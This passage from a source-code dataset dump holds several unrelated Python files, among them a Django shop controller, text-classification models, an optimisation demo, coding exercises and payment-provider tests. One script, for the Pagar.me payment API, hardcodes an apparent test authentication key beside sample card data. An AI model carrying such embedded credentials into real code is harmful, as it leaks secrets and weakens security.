e:\n\t\t\tprint(e,'\\n')\n\t\t\tconfirm = False\n\n\t\tif confirm == True:\n\t\t\tdel_data.delete()\n\t\treturn confirm\n\telse:\n\t\tprint('Tidak ada request HAPUS\\n')\n\t\treturn confirm\n\n\n# -------------- Kontrol untuk 
selling barang oleh seller -------------\ndef view_selling(List_ID):\n\tlist_view = []\n\tfor x in range(len(List_ID)):\n\t\t# stuff_obj = models.stuff.objects.get(id = List_ID[x])\n\t\tobj = models.selling.objects.filter(name_stuff = models.stuff.objects.get(id = List_ID[x]))\n\t\ttmp = []\n\t\tfor y in range(len(obj)):\n\t\t\ttmp.append(\n\t\t\t\t\t[str(obj[y].date), obj[y].pay_value, obj[y].count, obj[y].ship_cost,\n\t\t\t\t\tobj[y].pay_method, obj[y].buyer.username, obj[y].buyer, obj[y].id]\n\t\t\t\t)\n\t\tlist_view.append(tmp)\n\treturn list_view\n\n# -------- Kontrol untuk get /view profit per tahun ------------\ndef create_view_all(ID_Stuff):\n\tall_saldo = []\n\tfor x in range(len(ID_Stuff)):\n\t\tobj_sell = models.selling.objects.filter(\n\t\t\tname_stuff = models.stuff.objects.get(id = ID_Stuff[x]))\n\t\tfor y in range(len(obj_sell)):\n\t\t\tobj_saldo = models.profit.objects.get(sell_code = obj_sell[y])\n\t\t\tall_saldo.append(obj_saldo)\n\treturn all_saldo\n\ndef create_view_graph(list_sells):\n\tlist_saldo = []\n\tfor x in range(len(list_sells)):\n\t\ttry:\n\t\t\tlist_saldo.append(models.profit.objects.get(sell_code = list_sells[x][2]))\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\tprint(list_saldo)\n\tprint(datetime.today().date())\n\tyear_now = str(datetime.today().date()).split('-')[0]\n\tview = ['']*12\n\tmonth = ''\n\tfor x in range(len(list_saldo)):\n\t\tdate = str(list_saldo[x].date).split('-')\n\n\t\tif date[0] == year_now:\n\t\t\t# view.append(list_saldo[x])\n\t\t\tif x == 0:\n\t\t\t\tmonth = date[1]\n\t\t\t\tview[int(month)-1] = list_saldo[x].profit_sell\n\t\t\telif x > 0 and date[1] == month:\n\t\t\t\tview[int(month)-1] += list_saldo[x].profit_sell\n\t\t\telif x > 0 and date[1] != month:\n\t\t\t\tview[int(month)-1] = list_saldo[x].profit_sell\n\t\t\t\tmonth = date[1]\n\tprint(view)\n\treturn view\n\ndef selling_list(request):\n\tpass\n\t# ambil data semua barang yang ada di penjual\n\tstuffs = models.stuff.objects.filter(seller = request.user)\n\t# Ambil semua cart terkait barang itu\n\tcarts = []\n\tfor x in range(len(stuffs)):\n\t\tcarts += models.cart.objects.filter(stuff = stuffs[x]).order_by('date')\n\t# Hubungan 1 to 1 dengan selling data\n\t# carts.order_by('id')\n\tcarts.sort(reverse = True, key=lambda carts: carts.id)\n\t# print(carts)\n\ttrxs = []\n\tsells_prd = []\n\tsells_finish = []\n\tfor x in range(len(carts)):\n\t\ttry:\n\t\t\ttrxs.append(models.selling.objects.get(cart_ordered = carts[x]).trx_id)\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\n\t# Dapatkan list trx beserta jumlah tip trx nya\n\ttrxs_id = {i:trxs.count(i) for i in trxs}\n\ttrx_ids = list(trxs_id.keys())\n\tcount_trx_ids = list(trxs_id.values())\n\t# Ambil data selling setiap transaksi\n\tfor x in range(len(trx_ids)):\n\t\tsells = models.selling.objects.filter(trx_id = trx_ids[x])\n\t\t# 1 sells punya 1 produk\n\t\tprd_in_sell = []\n\t\tfor y in range(len(sells)):\n\t\t\tprd_in_sell.append(sells[y].cart_ordered.stuff.id)\n\n\t\ttmp_prd = {i:prd_in_sell.count(i) for i in prd_in_sell}\n\t\tprd_ids = list(tmp_prd.keys())\n\t\tcount_prd_ids = list(tmp_prd.values())\n\t\t# print(prd_in_sell, trx_ids[x])\n\t\t# Looping menentukan status order\n\t\tstates_order = []\n\t\tfor y in range(len(prd_ids)):\n\t\t\tstate_order = ''\n\t\t\tfor z in range(len(sells)):\n\t\t\t\tif str(prd_ids[y]) == str(sells[z].cart_ordered.stuff.id):\n\t\t\t\t\tstate_order = sells[z].cart_ordered.state_order\n\t\t\t# print(state_order, trx_code[x])\n\t\t\tstates_order.append(state_order)\n\n\t\ttmp_stuff = 
[]\n\t\ttmp_finish = []\n\t\tfor y in range(len(prd_ids)):\n\t\t\tobj_prd = models.stuff.objects.get(id = prd_ids[y])\n\t\t\tobj_post = models.products_post.objects.get(stuff_fk = obj_prd)\n\t\t\ttmp_stuff.append([obj_prd, obj_post, obj_prd.img_file.split('^!@!^')[0], count_prd_ids[y], states_order[y]])\n\t\t\t# print(tmp_stuff, x)\n\t\t\tif states_order[y] == 'finish':\n\t\t\t\ttmp_finish.append([obj_prd, obj_post, obj_prd.img_file.split('^!@!^')[0], count_prd_ids[y], states_order[y]])\n\n\t\tdetail_buyer = fk_user_main.user_sec.objects.get(fk_id_user = sells[0].buyer)\n\n\t\tsells_prd.append([trx_ids[x], tmp_stuff, sells[0], detail_buyer])\n\t\tsells_finish.append([trx_ids[x], tmp_finish, sells[0], detail_buyer])\n\n\t# print(sells_prd)\n\treturn sells_prd, trx_ids, sells_finish\n\n\t\n\n\n\n\n\n\n\n\n","repo_name":"SyaifudinRamadhan/online-shop","sub_path":"sellerSide/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":15517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"14818668783","text":"import datetime\nfrom pprint import pprint\n\nfrom googleapiclient.discovery import build\nfrom yaml_file_types import Haiku\n\nSPREADSHEET_ID = '163TTTMqbu_og6vOaRie8X-LGADXw-xZ904SU9ypDr38'\nRANGE_NAME = 'Haiku!A2:D'\n\ndef fetch_haiku(api_key):\n \"\"\"Obtains Haiku objects from the haiku spreadsheet\"\"\"\n rows = download_rows(api_key)\n return process_rows(rows)\n\ndef download_rows(api_key):\n \"\"\"Downloads raw data from the Haiku spreadsheet\"\"\"\n service = build('sheets', 'v4', developerKey=api_key)\n sheet = service.spreadsheets()\n result = sheet.values().get(spreadsheetId=SPREADSHEET_ID,\n range=RANGE_NAME).execute()\n rows = result.get('values', [])\n return rows\n\ndef process_rows(rows):\n \"\"\"Processes an array of table rows\"\"\"\n ctr_fail = 0\n result = []\n for row in rows:\n haiku = process_row(row)\n if haiku:\n result.append(haiku)\n else:\n ctr_fail += 1\n print('Done processing rows. 
' + str(len(result)) + ' rows ok, ' + str(ctr_fail) + ' rows ignored.')\n return result\n\ndef process_row(row):\n \"\"\"Given a raw table row, return a Haiku object, or False if the row is invalid\"\"\"\n pprint(row)\n if len(row) < 4:\n return False\n\n date = datetime.datetime.strptime(row[0], '%m/%d/%Y %H:%M:%S')\n author = row[1]\n text = list(filter(None, row[2].split('\\n')))\n topics = [topic.strip() for topic in row[3].split(';')] if row[3] else []\n \n return Haiku(date, author, text, topics)\n","repo_name":"chrispyduck/haiku","sub_path":"fetcher/downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"8156523224","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom math import sqrt\n# from transformers import BertModel\nimport math, copy\nfrom bert_serving.client import BertClient\nfrom sklearn.metrics.pairwise import cosine_similarity\nbc = BertClient(check_length=False)\n\ntorch.backends.cuda.matmul.allow_tf32 = False\ntorch.backends.cudnn.benchmark = True\ntorch.backends.cudnn.deterministic = False\ntorch.cuda.empty_cache()\n\ntorch.cuda.set_per_process_memory_fraction(0.8)\ntorch.backends.cudnn.enabled = True\n\ntorch.backends.cuda.max_memory_split_size = 1024 * 8\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\ndef pad_sequences(seq, min_len):\n padded_seq = torch.zeros((len(seq), min_len), dtype=torch.long)\n for i, s in enumerate(seq):\n end = min(len(s), min_len)\n padded_seq[i, :end] = torch.tensor(s[:end])\n return padded_seq\n\n# class AttentionLayer(nn.Module):\n# def __init__(self, input_dim):\n# super(AttentionLayer, self).__init__()\n# self.W = nn.Linear(input_dim, 1)\n# self.b = nn.Parameter(torch.Tensor(1))\n\n# def forward(self, inputs):\n# outputs = []\n# for sample in inputs:\n# u = self.W(sample) + self.b\n# a = F.softmax(u, dim=0)\n# weighted_input = sample * a\n# weighted_input = weighted_input.unsqueeze(0) # 添加维度\n# outputs.append(weighted_input) # 将 weighted_input 添加到 outputs\n# outputs = torch.cat(outputs, dim=0) # 沿着第0维度拼接\n# return outputs \n\ndef attention(query, key, value, mask=None, dropout=None):\n \"Compute 'Scaled Dot Product Attention'\"\n d_k = query.size(-1)\n scores = torch.matmul(query, key.transpose(-2, -1)) \\\n / math.sqrt(d_k)\n if mask is not None:\n scores = scores.masked_fill(mask == 0, -1e9)\n p_attn = F.softmax(scores, dim = -1)\n if dropout is not None:\n p_attn = dropout(p_attn)\n return torch.matmul(p_attn, value), p_attn\n\ndef clones(module, N):\n \"Produce N identical layers.\"\n return nn.ModuleList([copy.deepcopy(module) for _ in range(N)])\n\nclass MultiHeadedAttention(nn.Module):\n def __init__(self, h, d_model, dropout=0.1):\n \"Take in model size and number of heads.\"\n super(MultiHeadedAttention, self).__init__()\n assert d_model % h == 0\n # We assume d_v always equals d_k\n self.d_k = d_model // h\n self.h = h\n self.linears = clones(nn.Linear(d_model, d_model), 4)\n self.attn = None\n self.dropout = nn.Dropout(p=dropout)\n \n def forward(self, query, key, value, mask=None):\n \"Implements Figure 2\"\n if mask is not None:\n # Same mask applied to all h heads.\n mask = mask.unsqueeze(1)\n nbatches = query.size(0)\n \n # 1) Do all the linear projections in batch from d_model => h x d_k \n query, key, value = \\\n [l(x).view(nbatches, -1, self.h, self.d_k).transpose(1, 2)\n for l, x 
in zip(self.linears, (query, key, value))]\n \n # 2) Apply attention on all the projected vectors in batch. \n x, self.attn = attention(query, key, value, mask=mask, \n dropout=self.dropout)\n \n # 3) \"Concat\" using x view and apply x final linear. \n x = x.transpose(1, 2).contiguous() \\\n .view(nbatches, -1, self.h * self.d_k)\n return self.linears[-1](x)\n\nclass CNN_Text(nn.Module):\n \n def __init__(self, args):\n super(CNN_Text, self).__init__()\n self.args = args\n \n V = args.embed_num\n D = args.embed_dim\n C = args.class_num\n Ci = 1\n Co = args.kernel_num\n Ks = args.kernel_sizes\n\n self.embed = nn.Embedding(V, D)\n self.embed.weight.data.copy_(args.pretrained_weight)\n # self.convs1 = [nn.Conv2d(Ci, Co, (K, D)) for K in Ks]\n self.convs1 = nn.ModuleList([nn.Conv2d(Ci, Co, (K, D)) for K in Ks])\n self.relu2 = nn.LeakyReLU(negative_slope=0.01)\n self.dropout = nn.Dropout(args.dropout, self.training) \n self.fc2 = nn.Linear(128, 64).to(device)\n self.fc3 = nn.Linear(64, 1).to(device)\n # self.mattn = MultiHeadedAttention(h=8, d_model=D, dropout=0.1)\n\n\n\n # def conv_and_pool(self, x, conv):\n # x = F.relu(conv(x)).squeeze(3) # (N, Co, W)\n # x = F.max_pool1d(x, x.size(2)).squeeze(2)\n # return x\n\n \n # def Cosine_simlarity(self, vec1, vec2):\n # up = 0.0 \n # down = 0.0\n # down_1 = 0.0\n # down_2 = 0.0\n # for i in range(len(vec1)):\n # up += (vec1[i] * vec2[i])\n # for i in range(len(vec1)):\n # down_1 += (vec1[i] * vec1[i])\n # down_2 += (vec2[i] * vec2[i])\n # down = sqrt(down_1) * sqrt(down_2)\n # return float(up/down)\n\n def forward(self, q1, q2):\n\n max_len = max(self.args.kernel_sizes) + 1\n min_len = max_len if max_len % 2 == 0 else max_len + 1\n q1 = pad_sequences(q1, min_len)\n q2 = pad_sequences(q2, min_len)\n \n \n q1 = q1.to(device)\n q2 = q2.to(device)\n\n \n # 添加Transformer\n\n\n q1 = self.embed(q1) # (seq_len, batch_size, D)\n q2 = self.embed(q2)\n \n # q1=self.mattn(q1,q1,q1)\n # q2=self.mattn(q2,q2,q2)\n\n # print(q1.data.shape)\n \n # q1=bc.encode([q1])\n # q2=bc.encode([q2])\n \n if self.args.static:\n q1 = Variable(q1)\n q1 = q1.unsqueeze(1) # (N, Ci, W, D)\n \n # step1\n q1 = [self.relu2(conv(q1)).squeeze(3) for conv in self.convs1] # [(N, Co, W), ...]*len(Ks)\n # step2\n q1 = [i.size(2) * F.max_pool1d(i, i.size(2)).squeeze(2) for i in q1] # [(N, Co), ...]*len(Ks)\n q1 = [self.relu2(i) for i in q1]\n q1 = torch.cat(q1, 1) # 64 * 300\n \n q1 = self.dropout(q1) # (N, len(Ks)*Co)\n \n\n \n \n\n # q2.data = q2.data.weight.data.copy_(torch.from_numpy(pretrained_weight))\n if self.args.static:\n q2 = Variable(q2)\n q2 = q2.unsqueeze(1) # (N, Ci, W, D)\n \n q2 = [self.relu2(conv(q2)).squeeze(3) for conv in self.convs1] # [(N, Co, W), ...]*len(Ks)\n q2 = [i.size(2) * F.max_pool1d(i, i.size(2)).squeeze(2) for i in q2] # [(N, Co), ...]*len(Ks)\n q2 = [self.relu2(i) for i in q2]\n q2 = torch.cat(q2, 1)\n q2 = self.dropout(q2) # (N, len(Ks)*Co)\n\n \n \n x = torch.cat((q1, q2), dim=1)\n \n x=x.to(device)\n concatenated_dim = q1.size(1) + q2.size(1)\n self.fc1 = nn.Linear(concatenated_dim, 128).to(device)\n \n x = self.fc1(x)\n x = self.fc2(x)\n x = self.fc3(x)\n \n return torch.sigmoid(x)\n\n\n \n \n\t# #step3\n # cos_ans = F.cosine_similarity(q1, q2)\n # cos_ans=torch.sigmoid(cos_ans)\n # # cos_ans = nn.functional.pairwise_distance(q1, q2, p=2, eps=1e-06)\n # # cos_ans = F.relu(cos_ans)\n # # print(cos_ans.data)\n # return cos_ans\n 
\n\n\n\n","repo_name":"CarpVexing/CorNER","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":7347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"35255553802","text":"import tensorflow as tf\nimport numpy as np\nimport csv\nimport model\nimport datetime\n\n\ndef load_data(path):\n \"\"\"\n Load input data from csv files\n :param path: the path of the file\n :return: the list of data\n \"\"\"\n csvfile = open(path, 'r')\n csvreader = csv.reader(csvfile, dialect='excel')\n data = []\n for row in csvreader:\n data.append(list(row))\n csvfile.close()\n return data\n\n\ndef clean_data(data):\n \"\"\"\n Clean raw data into train data\n :param data: raw data\n :return: clean data of Ndarray\n \"\"\"\n train_data = []\n for row in data:\n train_data.append(row.strip('[]').split(','))\n return np.array(train_data, np.int32)\n\n\ndef train_pred(X, Y, test_X, batch_size=64, epochs=200, embedding_size=128, filter_sizes=[3, 4, 5], num_filters=128,\n dropout_keep_prob=0.5):\n \"\"\"\n Train TextCNN model and make prediction\n :param X: train data matrix [m, n]\n :param Y: labels matrix [m, classes_num]\n :param test_X: test data matrix [m, n]\n :param batch_size: batch size\n :param epochs: number of training epochs\n :param embedding_size: dimensionality of character embedding, that is the length of the word vector\n :param filter_sizes: list of filter sizes, similar to n-gram\n :param num_filters: number of filters per filter size\n :param dropout_keep_prob: dropout keep probability\n :return: prediction on test_X by trained model\n \"\"\"\n # build the model\n dicts = load_data('./data/dicts.csv')\n cnn = model.TextCNN(X.shape[1], Y.shape[1], len(dicts), embedding_size, filter_sizes, num_filters)\n\n # define training procedure\n global_step = tf.Variable(0, name='global_step', trainable=False)\n optimizer = tf.train.AdamOptimizer(1e-4) # use Adam algorithm to find global optimization\n grads_and_vars = optimizer.compute_gradients(cnn.loss)\n train_op = optimizer.apply_gradients(grads_and_vars, global_step=global_step) # a gradient update on our parameters\n\n sess = tf.Session() # Launch the graph in a session\n sess.run(tf.global_variables_initializer()) # initialize the model parameters\n\n def train_step(X_batch, Y_batch):\n \"\"\"\n A single training step\n :param X_batch: a batch of input data\n :param Y_batch: same batch of output label\n :return: null\n \"\"\"\n # feed_dict contains the data for the placeholder nodes we pass to our network\n feed_dict = {cnn.input_X: X_batch, cnn.input_Y: Y_batch, cnn.dropout_keep_prob: dropout_keep_prob}\n _, step, loss, accuracy = sess.run([train_op, global_step, cnn.loss, cnn.accuracy], feed_dict)\n\n # output process\n time_str = datetime.datetime.now().isoformat()\n if (step % 1000 == 0):\n print('{}: step {}, loss {:g}, acc {:g}'.format(time_str, step, loss, accuracy))\n\n def batch_iter(input_X, input_Y, batch_size):\n \"\"\"\n Generate batches\n :param input_X:\n :param input_Y:\n :param batch_size: batch size\n :return: list of batches\n \"\"\"\n m = input_X.shape[0]\n blocks = m // batch_size # the number of W changes\n batches = []\n for i in range(blocks):\n begin = i * batch_size\n end = (i + 1) * batch_size\n batches.append((input_X[begin: end], input_Y[begin: end]))\n if m % batch_size != 0:\n batches.append((input_X[blocks * batch_size:], input_Y[blocks * batch_size:]))\n return batches\n\n batches = batch_iter(X, Y, batch_size)\n # training loop\n for 
k in range(epochs):\n for batch in batches:\n X_batch, Y_batch = batch\n train_step(X_batch, Y_batch)\n cur_step = tf.train.global_step(sess, global_step)\n\n def make_prediction(X_batch, Y_batch):\n \"\"\"\n A prediction step\n :param X_batch: a batch of input test data\n :param Y_batch: [0]*classes_num\n :return: predictions\n \"\"\"\n # use feed_dict to feed data\n feed_dict = {cnn.input_X: X_batch, cnn.input_Y: Y_batch, cnn.dropout_keep_prob: 1.0}\n predictions = sess.run(cnn.predictions, feed_dict)\n return predictions\n\n test_Y = []\n for test_case in test_X:\n test_Y.append(make_prediction([test_case], [[0, 0, 0, 0, 0]])[0])\n\n sess.close()\n return test_Y\n\n\ndef save_data(path, data):\n \"\"\"\n Save data to a csv file\n :param path: the path of the file\n :param data: prediction data\n :return: null\n \"\"\"\n csvfile = open(path, 'w', newline='')\n csvwriter = csv.writer(csvfile, dialect='excel')\n for result in data:\n csvwriter.writerow(result)\n csvfile.close()\n\n\nif __name__ == '__main__':\n # load data\n train_raw = load_data('./data/train_in.csv')\n test_raw = load_data('./data/test_in.csv')\n\n # limit the data size, in case of running out of the memory\n train_size = 10000\n test_size = 5000\n\n # convert raw data to training data (Ndarray)\n train_X, train_Y = zip(*train_raw) # unzip the train data into input data and label\n train_X, train_Y = clean_data(train_X[:train_size]), clean_data(train_Y[:train_size])\n test_X = np.array(test_raw[:test_size], np.int32)\n print(train_X.shape, train_Y.shape, test_X.shape)\n\n test_Y = train_pred(train_X, train_Y, test_X)\n\n # save the prediction result to csv file\n output = [['PhraseId', 'Sentiment']]\n for i in range(1, test_size):\n output.append([test_raw[i][0], test_Y[i - 1]]) # Phrase in test_raw + prediction sentiment\n save_data('result.csv', output)\n","repo_name":"JuliaSun623/nlp-beginner-solution","sub_path":"Task2/tf-CNN/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5579,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"26870479317","text":"import numpy as np\nimport pypoman\nfrom pypoman.projection import project_point_to_polytope\nimport matplotlib.pyplot as plt\nfrom numpy import arange, array, cos, pi, sin\nimport pylab\n\n# vertices\nvertices = np.array([(1., 3.), (2., 1.),\n (2., 5.), (4., 6.),\n (6., 5.), (6., 3.),\n (5., 1.5)])\n\n# generate A matrix and b vector\nA, bv = pypoman.compute_polytope_halfspaces(vertices)\nineq = (A, bv)\n# mean cost\nC = np.array([4, 6])\n\n# minimum x\nvCost = vertices.dot(C)\nminX = vertices[np.argmin(vCost)]\n\n# step size parameter\na = 0.5\nb = 1\ngamma = 1\n\n# number of iterations\nT = 1000\n# batch size for costs\nB = 5\n# number of realisations\nR = 1000\n\nerr = np.zeros((R, T))\nfor j in range(R):\n # starting point\n x = np.random.normal([3, 3], [1, 1], size=2)\n for i in range(T):\n alphat = a/((b+i)**gamma)\n ct = np.transpose(np.random.normal([C[0], C[1]], [5, 5], size=(B, 2)))\n ct = np.sum(ct, axis=1)/B\n\n x -= alphat * ct\n\n # plot the polytope and projections\n\n # pylab.ion()\n # pylab.figure(figsize=(7, 7))\n # pylab.gca().set_aspect(\"equal\")\n # pypoman.plot_polygon(vertices,color='grey')\n # pylab.plot([x[0]], [x[1]], marker='x', markersize=6, color='k')\n # point = x\n x = project_point_to_polytope(x, ineq)\n\n # pylab.plot([x[0]], [x[1]], marker='o', markersize=5, color='k')\n # pylab.plot([point[0], x[0]], [point[1], x[1]], 'k--')\n # pylab.xlim([0, 8])\n # 
pylab.ylim([0, 8])\n # pylab.xticks(list(range(9)))\n # pylab.yticks(list(range(9)))\n # pylab.tick_params(axis='both', labelsize=15)\n # pylab.xlabel(\"$x_1$\", fontsize=20)\n # pylab.ylabel(\"$x_2$\", fontsize=20)\n # # pylab.savefig('./Figures/LPPolytope.pdf', format='pdf')\n # pylab.show()\n\n err[j][i] = np.abs(np.dot(C, x)-np.dot(C, minX))\n\nerrL1 = np.sum(err, axis=0)/R\n\n# --------------------------------------------------------------------------------------- #\nidx = np.nonzero(errL1)\nrangeT = np.array([i for i in range(1, T+1)])\n# fit the rate\nprint(np.polyfit(np.log(rangeT[idx]), np.log(errL1[idx]), 1)[0])\n# plot and save the figure\nfig, ax = plt.subplots(figsize=(8, 6))\nfig.tight_layout(pad=6)\nax.loglog(rangeT, errL1, 'k', linewidth=3)\nax.plot([1, 1e3], [5e-2, 5e-5], 'k--')\nax.legend([\"PSGD\", \"$\\mathcal{O}(t^{-1})$\"], fontsize=20)\nax.grid()\nax.set_xlabel('t', fontsize=20)\nax.set_ylabel(r'$\\mathbb{E}[|c^Tx_t - c^Tx^*|]$', fontsize=20)\nax.tick_params(axis='both', labelsize=15)\nplt.savefig('./Figures/LinearProgramsPSGDB{}.pdf'.format(B), format='pdf')\nplt.show()\n\n\n\n\n\n\n\n","repo_name":"Shangda-Yang/PSGD","sub_path":"LinearProgram.py","file_name":"LinearProgram.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"21225767175","text":"import pagarme\r\n\r\npagarme.authentication_key('ak_test_wWCz5DhB73yJyoO5sYkMre2wEjFKib')\r\n\r\nparams = {\r\n\t\t\"amount\": \"21000\",\r\n \"card_number\": \"4111111111111111\",\r\n \"card_cvv\": \"123\",\r\n \"card_expiration_date\": \"0922\",\r\n \"card_holder_name\": \"Morpheus Fishburne\",\r\n \"customer\": {\r\n \"external_id\": \"#3311\",\r\n \"name\": \"Morpheus Fishburne\",\r\n \"type\": \"individual\",\r\n \"country\": \"br\",\r\n \"email\": \"mopheus@nabucodonozor.com\",\r\n \"documents\": [\r\n {\r\n \"type\": \"cpf\",\r\n \"number\": \"30621143049\"\r\n }\r\n ],\r\n \"phone_numbers\": [\"+5511999998888\", \"+5511888889999\"],\r\n \"birthday\": \"1965-01-01\"\r\n },\r\n \"billing\": {\r\n \"name\": \"Trinity Moss\",\r\n \"address\": {\r\n \"country\": \"br\",\r\n \"state\": \"sp\",\r\n \"city\": \"Cotia\",\r\n \"neighborhood\": \"Rio Cotia\",\r\n \"street\": \"Rua Matrix\",\r\n \"street_number\": \"9999\",\r\n \"zipcode\": \"06714360\"\r\n }\r\n },\r\n \"shipping\": {\r\n \"name\": \"Neo Reeves\",\r\n \"fee\": \"1000\",\r\n \"delivery_date\": \"2000-12-21\",\r\n \"expedited\": True,\r\n \"address\": {\r\n \"country\": \"br\",\r\n \"state\": \"sp\",\r\n \"city\": \"Cotia\",\r\n \"neighborhood\": \"Rio Cotia\",\r\n \"street\": \"Rua Matrix\",\r\n \"street_number\": \"9999\",\r\n \"zipcode\": \"06714360\"\r\n }\r\n },\r\n \"items\": [\r\n {\r\n \"id\": \"r123\",\r\n \"title\": \"Red pill\",\r\n \"unit_price\": \"10000\",\r\n \"quantity\": \"1\",\r\n \"tangible\": True\r\n },\r\n {\r\n \"id\": \"b123\",\r\n \"title\": \"Blue pill\",\r\n \"unit_price\": \"10000\",\r\n \"quantity\": \"1\",\r\n \"tangible\": True\r\n }\r\n ]\r\n}\r\n\r\ncard_data = {\r\n \"card_expiration_date\": \"1122\",\r\n \"card_number\": \"4018720572598048\",\r\n \"card_cvv\": \"123\",\r\n \"card_holder_name\": \"Cersei Lannister\"\r\n}\r\n\r\nprint (pagarme.card.create(card_data))\r\n\r\n\r\n\r\ntransfer_params = {\r\n 'amount': '10000',\r\n 'recipient_id': 'RECIPIENT_ID'\r\n}\r\n\r\ntransfer = pagarme.transfer.create(transfer_params)\r\n\r\nprint (transfer)\r\n\r\n\r\ntrx = pagarme.transaction.create(params)\r\n\r\nprint(trx)\r\n\r\ntrx = 
pagarme.transaction.create(params)\r\nprint(trx)\r\n\r\n\r\nbalance = pagarme.balance.default_recipient_balance()\r\nprint(balance)","repo_name":"flcavqueiroz/houp-api","sub_path":"pagarme_test.py","file_name":"pagarme_test.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"31620454584","text":"# 시간초과 나는 코드 -> 인덱스로 접근하기 때문에 최악의 경우 시간복잡도가 O(n^2)\n# num = int(input())\n# val = list(map(int, input().split()))\n# res = []\n#\n# while val:\n# k = val.pop()\n# a = len(val)\n# flag = 0\n# if a == 0:\n# res.append(0)\n# break\n# while k > val[a - 1]:\n# a -= 1\n# if a == 0:\n# break\n# res.append(a)\n#\n# res.reverse()\n# res = list(map(str, res))\n# print(' '.join(res))\n\nnum = int(input())\nval = list(map(int, input().split()))\nres = [0] * num\nstack = []\n#스택에 현재 탑의 인덱스들을 저장\nfor i in range(num):\n #스택이 비어있지 않고, 스택의 마지막값이 들어온 값보다 작을경우 그 스택을 제거\n while stack and val[stack[-1]] < val[i]:\n stack.pop()\n #스택이 비어있지 않고, 마지막값이 들어온값보다 클때 -> 조건 만족\n #정답의 위치에 해당 인덱스값 + 1을 저장\n if stack:\n res[i] = stack[-1] + 1\n #스택에 인덱스 저장\n stack.append(i)\n\nres = list(map(str, res))\nprint(' '.join(res))","repo_name":"seyeon22222/Self_study","sub_path":"Stack/Top(2493).py","file_name":"Top(2493).py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"994029866","text":"from .models import SalesPerson, PotentialCustomer, AutomobileVO, SalesRecord\nfrom common.json import ModelEncoder\n\nclass SalesPersonEncoder(ModelEncoder):\n model = SalesPerson\n properties = [\n \"name\",\n \"employee_number\",\n ]\n\nclass PotentialCustomerEncoder(ModelEncoder):\n model = PotentialCustomer\n properties= [\n \"name\",\n \"address\",\n \"phone_number\",\n ]\n\nclass AutomobileVOEncoder(ModelEncoder):\n model = AutomobileVO\n properties = [\n \"vin\",\n \"sold\",\n ]\n\nclass SalesRecordEncoder(ModelEncoder):\n model = SalesRecord\n properties = [\n \"automobile\",\n \"salesperson\",\n \"customer\",\n \"price\",\n ]\n\n encoders = {\n \"automobile\": AutomobileVOEncoder(),\n \"salesperson\": SalesPersonEncoder(),\n \"customer\": PotentialCustomerEncoder(),\n }","repo_name":"eugenehong270/next-gen-motors","sub_path":"sales/api/sales_rest/encoders.py","file_name":"encoders.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"25030834213","text":"# Time complexity : O(log N)\n# Space complexity : O(1)\nclass Solution:\n def evenlyDivides(self, N):\n num = N\n count = 0\n while num > 0:\n rem = num % 10\n if rem != 0 and N % rem == 0:\n count = count + 1\n num = num // 10\n return count\n\n\nif __name__ == \"__main__\":\n t = int(input())\n for _ in range(t):\n N = int(input())\n\n ob = Solution()\n print(ob.evenlyDivides(N))\n","repo_name":"anuva312/Strivers-A2Z-DSA-Course","sub_path":"3. Basic Maths/1. 
Count Digits/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"42172339878","text":"import pytest\n\nfrom django_pay2.providers.qiwi.serializers import QiwiNotifySerializer\n\npytestmark = pytest.mark.django_db\n\n\nclass TestQiwiNotifySerializer:\n @pytest.fixture\n def payment(self, payment_factory, sample_uid):\n return payment_factory(amount=\"10.00\", id=sample_uid)\n\n @pytest.fixture(autouse=True)\n def set_qiwi_secret_key(self, settings):\n settings.PAYMENTS = {\"QIWI\": {\"secret_key\": \"qwerty\"}}\n\n def test_positive(self, sample_uid, payment):\n serializer = QiwiNotifySerializer(\n data={\n \"bill\": {\n \"siteId\": \"1234\",\n \"billId\": sample_uid,\n \"amount\": {\"value\": \"10.00\", \"currency\": \"RUB\"},\n \"status\": {\n \"value\": \"PAID\",\n },\n }\n },\n context={\n \"hmac\": \"4dce0933f565dde1b45bc73ccb91af755fcad313751371de9688521e5b49b9f4\"\n },\n )\n\n assert serializer.is_valid(), serializer.errors\n\n def test_if_hmac_is_invalid(self, sample_uid, payment):\n serializer = QiwiNotifySerializer(\n data={\n \"bill\": {\n \"siteId\": \"1234\",\n \"billId\": sample_uid,\n \"amount\": {\"value\": \"10.00\", \"currency\": \"RUB\"},\n \"status\": {\n \"value\": \"PAID\",\n },\n }\n },\n context={\n \"hmac\": \"aef5c05b1ee219d8ff954db86020de22867304f274d894b0b725d50d9ea138b5\"\n },\n )\n\n assert not serializer.is_valid()\n\n def test_if_amount_mismatches(self, sample_uid, payment):\n serializer = QiwiNotifySerializer(\n data={\n \"bill\": {\n \"siteId\": \"1234\",\n \"billId\": sample_uid,\n \"amount\": {\"value\": \"20.00\", \"currency\": \"RUB\"},\n \"status\": {\n \"value\": \"PAID\",\n },\n }\n },\n context={\n \"hmac\": 